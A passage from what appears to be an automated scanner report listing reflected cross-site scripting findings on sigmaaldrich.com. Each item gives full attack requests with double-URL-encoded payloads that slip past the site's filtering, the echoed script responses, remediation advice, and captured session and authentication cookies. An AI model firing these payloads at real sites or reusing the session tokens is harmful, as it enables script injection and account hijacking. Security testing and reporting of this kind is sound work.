fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:30 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc4905f";alert(1)//4f88a8734e2/medialib/logos/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.414. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03cd%2522%253balert%25281%2529%252f%252fba6c693ffba was submitted in the REST URL parameter 2. This input was echoed as f03cd";alert(1)//ba6c693ffba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf03cd%2522%253balert%25281%2529%252f%252fba6c693ffba/logos/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf03cd";alert(1)//ba6c693ffba/logos/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.415. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c3b2%2522%253balert%25281%2529%252f%252f69600188367 was submitted in the REST URL parameter 3. This input was echoed as 7c3b2";alert(1)//69600188367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos7c3b2%2522%253balert%25281%2529%252f%252f69600188367/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos7c3b2";alert(1)//69600188367/sigma-aldrich-logo0","E404") ;
   </script>
...[SNIP]...

1.416. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5d78%2522%253balert%25281%2529%252f%252f95081fe8cd7 was submitted in the REST URL parameter 4. This input was echoed as f5d78";alert(1)//95081fe8cd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/sigma-aldrich-logo0f5d78%2522%253balert%25281%2529%252f%252f95081fe8cd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/sigma-aldrich-logo0f5d78";alert(1)//95081fe8cd7","E404") ;
   </script>
...[SNIP]...

1.417. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35d34%2522%253balert%25281%2529%252f%252fddc4842eea0 was submitted in the REST URL parameter 1. This input was echoed as 35d34";alert(1)//ddc4842eea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc35d34%2522%253balert%25281%2529%252f%252fddc4842eea0/medialib/logos/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:27 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc35d34";alert(1)//ddc4842eea0/medialib/logos/small-signup-icon","E404") ;
   </script>
...[SNIP]...

1.418. http://www.sigmaaldrich.com/etc/medialib/logos/small-signup-icon [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/small-signup-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e093%2522%253balert%25281%2529%252f%252f546f4c6ebec was submitted in the REST URL parameter 2. This input was echoed as 8e093";alert(1)//546f4c6ebec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib8e093%2522%253balert%25281%2529%252f%252f546f4c6ebec/logos/small-signup-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; 